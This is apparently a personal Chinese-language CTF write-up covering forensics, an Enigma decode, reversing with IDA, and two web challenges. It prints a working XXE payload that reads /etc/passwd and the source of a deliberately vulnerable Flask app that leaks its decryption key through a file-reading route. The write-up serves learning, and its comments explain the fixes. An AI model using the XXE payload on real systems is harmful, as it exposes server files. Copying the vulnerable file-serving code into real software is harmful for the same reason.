因为只会web,其他方向都没碰过,所以只出了4道
做出来的:
ezEvtx

找到一个被移动的文件,疑似被入侵

提交flag{confidential.docx}成功解出
flag{confidential.docx}
Flowzip

过滤器搜索flag找到flag
flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}
Enigma

将加密后的密文丢进cyberchef,选择Enigma,解出明文
flag{HELLOCTFERTHISISAMESSAGEFORYOU}
星际XML解析器

<?xml version="1.0"?>
<!-- XXE probe: the DTD below declares the external entity "xxe" with a
     file:// SYSTEM identifier, and <user> references it. A parser that
     resolves external entities substitutes the file contents into the
     element. Parsers that accept untrusted XML should have DTD processing
     and external entity resolution switched off. -->
<!DOCTYPE message [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<message>
<user>&xxe;</user>
</message>
上面的payload先读取/etc/passwd来测试XXE是否可用;确认解析器会展开外部实体后,成功访问到根目录下的flag文件。根本原因是解析器对不可信的XML启用了DTD和外部实体解析,修复方式是在解析器配置中禁用DTD与外部实体
flag{232d46ad-bc55-4484-a134-45c8f54b2622}
没做出来的:
密室黑客逃脱:
快进到得到源码
import os
from flask import Flask, request, render_template
from config import *
# author: gamelab
app = Flask(__name__)

# Simulated secret and the key used to obscure it. Neither name is defined in
# this listing; presumably both arrive through `from config import *`.
sensitive_info, encryption_key = SENSITIVE_INFO, ENCRYPTION_KEY
def simple_encrypt(text, key):
    """Obscure *text* by adding the repeating *key* to it, code point by code point.

    Each output byte is ``ord(text[i]) + ord(key[i % len(key)])`` and the
    result is returned as a lowercase hex string.

    NOTE(review): this is a repeating-key additive shift, not encryption.
    Anyone holding the key reverses it with one subtraction per byte, so the
    output is only as secret as the key is. A sum above 255 does not fit in a
    byte and makes ``bytearray`` raise ``ValueError``.
    """
    shifted = bytearray(
        ord(symbol) + ord(key[position % len(key)])
        for position, symbol in enumerate(text)
    )
    return shifted.hex()
# Obscure the secret once, at import time.
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)

# Simulated log line. It embeds the ciphertext, and the /logs route renders it.
log_content = f"用户访问了 /secret 页面,可能试图获取 {encrypted_sensitive_info}"

# Simulated hidden-file content: the key itself, in plaintext.
hidden_file_content = f"解密密钥: {encryption_key}"

# Directory the /file route is meant to stay inside.
SAFE_ROOT_DIR = os.path.abspath('/app')

# NOTE(review): the key file is written into SAFE_ROOT_DIR, the same tree the
# /file route reads from, so the path check in that route does not protect it.
# Key material belongs outside any directory that is served to clients.
with open(
    os.path.join(SAFE_ROOT_DIR, 'hidden.txt'),
    'w',
) as f:
    f.write(hidden_file_content)
@app.route('/')
def index():
    """Render the index.html template for the site root."""
    page = render_template('index.html')
    return page
@app.route('/logs')
def logs():
    """Render logs.html with the module-level ``log_content`` string.

    NOTE(review): the route has no access check, and ``log_content`` carries
    the hex ciphertext of the secret, so every visitor can read it.
    """
    template_context = {'log_content': log_content}
    return render_template('logs.html', **template_context)
@app.route('/secret')
def secret():
    """Render the secret.html template; no data is passed to it."""
    page = render_template('secret.html')
    return page
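@app.route('/file')
def file():
    """Return the contents of the file under SAFE_ROOT_DIR named by ``?name=``.

    The name comes straight from the query string, so it is untrusted. The
    resolved path is confined to SAFE_ROOT_DIR by path component rather than
    by string prefix: a ``startswith`` test also accepts sibling paths whose
    names merely begin with the root string. Paths containing ``config`` stay
    blocked as before.

    Returns the rendered template for: a missing name, a denied path, a
    missing or non-regular file, or the file content.

    NOTE(review): the ``config`` substring denylist is the only per-file
    restriction. Everything else under the root stays readable, including the
    hidden.txt this module writes at import time. An allowlist of servable
    files would be the safer design.
    """
    file_name = request.args.get('name')
    if not file_name:
        return render_template('no_file_name.html')

    # abspath collapses '..' segments but does not resolve symlinks.
    full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))
    try:
        inside_root = os.path.commonpath([SAFE_ROOT_DIR, full_path]) == SAFE_ROOT_DIR
    except ValueError:
        # Raised when the two paths cannot be compared; treat as outside.
        inside_root = False

    if not inside_root or 'config' in full_path:
        return render_template('no_premission.html')

    try:
        with open(full_path, 'r') as f:
            content = f.read()
    except (FileNotFoundError, IsADirectoryError, NotADirectoryError):
        # A directory (for example name=".") used to surface as an unhandled
        # error; report it the same way as a missing file.
        return render_template('file_not_found.html')
    except PermissionError:
        return render_template('no_premission.html')
    return render_template('file_content.html', content=content)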
if __name__ == '__main__':
    # NOTE(review): debug=True turns on the Werkzeug debugger (tracebacks and
    # a PIN-protected interactive console), and host='0.0.0.0' listens on
    # every interface. Together they expose the debugger to anyone who can
    # reach the port. Tolerable in a throwaway challenge container only.
    app.run(host='0.0.0.0', debug=True)
从源码可以看到:密文被拼进了/logs页面的日志内容,密钥被写进了/app/hidden.txt,而/file路由可以读取/app下路径中不含config的文件。获得密钥和密文后就可以编写解密程序了
def simple_decrypt(encrypted_hex, key):
    """Reverse the additive shift: hex string in, UTF-8 text out.

    Each byte of the decoded hex has ``ord(key[i % len(key)])`` subtracted
    from it, and the resulting bytes are decoded as UTF-8. A wrong key can
    drive a byte below zero, in which case ``bytearray`` raises
    ``ValueError``.
    """
    cipher_bytes = bytearray.fromhex(encrypted_hex)
    plain_bytes = bytearray(
        value - ord(key[position % len(key)])
        for position, value in enumerate(cipher_bytes)
    )
    return plain_bytes.decode('utf-8')
# Hex ciphertext and key as obtained from the challenge, kept as named values.
ciphertext_hex = "d9d1c4d9e0abc2a497df9a9a6c5fa4c9c9a592a8c39ccba6709b6b98a0c7c6d89cd994a39aae6f6f68af"
recovered_key = "secret_key8672"
print(simple_decrypt(ciphertext_hex, recovered_key))
# flag{7c92fbd5-1df3-4d1f-8e4f-bcf7e5855791}
解密程序不会写偷了一个,这个没得说,没有AI,我又没学过密码,确实不太会解密
ShadowPhases
现在复盘看,当时没看这道题真牛魔可惜,50分送到嘴边了都没要QaQ
下载下来exe文件检查没有壳直接丢进IDA
/*
 * main, as decompiled by IDA/Hex-Rays (pseudocode, not compilable C).
 *
 * Builds three byte tables on the stack, copies each into its own heap
 * buffer, passes every buffer through sub_4015B6 with a one-byte parameter
 * taken from v19, NUL-terminates the results and joins them into Str2 with
 * the "%s%s%s" format. It then reads at most 127 characters into Str1 and
 * compares the two with strcmp.
 *
 * NOTE(review): the expected value is fully rebuilt in Str2 before the
 * comparison, so it sits in process memory in plaintext at the strcmp call.
 * A check performed entirely on the client cannot keep that value secret.
 * sub_4015B6, sub_401550 and sub_401B10 are not shown here; what they do is
 * inferred only from how they are called.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
char Str1[128]; // [rsp+30h] [rbp-50h] BYREF
char Str2[128]; // [rsp+B0h] [rbp+30h] BYREF
void *v6; // [rsp+130h] [rbp+B0h]
void *v7; // [rsp+138h] [rbp+B8h]
void *v8; // [rsp+140h] [rbp+C0h]
void *v9; // [rsp+150h] [rbp+D0h]
void *v10; // [rsp+158h] [rbp+D8h]
void *v11; // [rsp+160h] [rbp+E0h]
char v12[13]; // [rsp+16Eh] [rbp+EEh] BYREF
char v13[15]; // [rsp+17Bh] [rbp+FBh] BYREF
char Src[5]; // [rsp+18Ah] [rbp+10Ah] BYREF
char v15[9]; // [rsp+18Fh] [rbp+10Fh] BYREF
void *v16; // [rsp+198h] [rbp+118h]
void *v17; // [rsp+1A0h] [rbp+120h]
void *Block; // [rsp+1A8h] [rbp+128h]
char v19[6]; // [rsp+1B2h] [rbp+132h] BYREF
size_t v20; // [rsp+1B8h] [rbp+138h]
size_t v21; // [rsp+1C0h] [rbp+140h]
size_t Size; // [rsp+1C8h] [rbp+148h]
sub_401B10(argc, argv, envp);
// First table, 14 bytes. The decompiler split it into Src (5 bytes at
// rsp+18Ah) and v15 (9 bytes at rsp+18Fh); the two are adjacent on the stack,
// and the memcpy below copies Size = 14 bytes starting at Src, so it spans both.
Src[0] = 0;
Src[1] = 5;
Src[2] = -125;
Src[3] = 0x80;
Src[4] = -114;
// strcpy of "+" writes v15[0] = '+' and v15[1] = 0.
strcpy(v15, "+");
v15[2] = -125;
v15[3] = 47;
v15[4] = -86;
v15[5] = 43;
v15[6] = -127;
v15[7] = -88;
v15[8] = -91;
Size = 14i64;
// Second table, 15 bytes (length kept in v21).
v13[0] = 19;
v13[1] = 57;
v13[2] = -66;
v13[3] = -66;
v13[4] = -76;
v13[5] = 56;
v13[6] = -72;
v13[7] = -70;
v13[8] = -69;
v13[9] = -76;
v13[10] = 62;
v13[11] = -112;
v13[12] = 58;
v13[13] = -70;
v13[14] = -76;
v21 = 15i64;
// Third table, 13 bytes (length kept in v20).
v12[0] = -117;
v12[1] = -119;
v12[2] = 34;
v12[3] = -120;
v12[4] = -117;
v12[5] = 32;
v12[6] = 9;
v12[7] = 34;
v12[8] = -120;
v12[9] = 8;
v12[10] = -115;
v12[11] = -120;
v12[12] = -81;
v20 = 13i64;
// v19[0..2] become '"', 'D', 'f' (0x22, 0x44, 0x66) and are the per-table
// parameters passed to sub_4015B6 below. v19[3..5] are written but never read
// in this function.
v19[5] = -103;
v19[4] = -35;
v19[3] = -1;
qmemcpy(v19, "\"Df", 3);
// Each heap buffer is one byte longer than its table (15, 16 and 14 bytes),
// which leaves room for the terminator written after the transform.
Block = malloc(0xFui64);
v17 = malloc(v21 + 1);
v16 = malloc(v20 + 1);
if ( !Block || !v17 || !v16 )
{
puts(Buffer);
exit(1);
}
memcpy(Block, Src, Size);
memcpy(v17, v13, v21);
memcpy(v16, v12, v20);
// Transform each buffer with its own parameter: Block uses v19[2], v17 uses
// v19[1], v16 uses v19[0]. Presumably an in-place decode; confirm in
// sub_4015B6.
sub_4015B6(Block, Size, (unsigned __int8)v19[2]);
sub_4015B6(v17, v21, (unsigned __int8)v19[1]);
sub_4015B6(v16, v20, (unsigned __int8)v19[0]);
// NUL-terminate so the buffers can be used as C strings.
*((_BYTE *)Block + Size) = 0;
*((_BYTE *)v17 + v21) = 0;
*((_BYTE *)v16 + v20) = 0;
// v6..v11 only receive copies of the three buffer pointers and are not used
// again in this function.
v9 = v17;
v10 = v16;
v11 = Block;
v6 = Block;
v7 = v17;
v8 = v16;
// Joins the three strings, in the order Block, v17, v16, into the 128-byte
// Str2 (14 + 15 + 13 = 42 characters). From this line on Str2 holds the full
// expected value.
sub_401550(Str2, 128i64, "%s%s%s", (const char *)Block, (const char *)v17, (const char *)v16);
printf("请输入 flag: ");
// The %127s width keeps the read inside the 128-byte Str1.
scanf("%127s", Str1);
if ( !strcmp(Str1, Str2) )
puts(asc_40502A);
else
puts(asc_405031);
free(Block);
free(v17);
free(v16);
return 0;
}
伪C长这样,简单看一下,猜测在if ( !strcmp(Str1, Str2) )
这里有flag值,在这里加断点进行动态调试


最后在栈的这里找到flag(虽然不知道为什么我看他们的是合在一行的,我的是分开的,但是只要拿到flag就好。推测是因为三段内容分别解码到Block、v17、v16三块缓冲区里,拼接后的完整字符串在Str2中,所以看到的是分段还是整行取决于查看的是哪一块内存)
BashBreaker
这个题抽象的没边,不看了
RuneBreach
沟槽的pwn,不看了
crawler
两解题,当然不是我能做的
Jdbc_once
零解,可能出题方不出一个零解题出题方心里不得劲
剩下两道密码也是看都看不懂喵,但是easy_AES后面又被py烂了,咸鱼又发力了,给我的排名最后半小时挤下去150(不嘻嘻)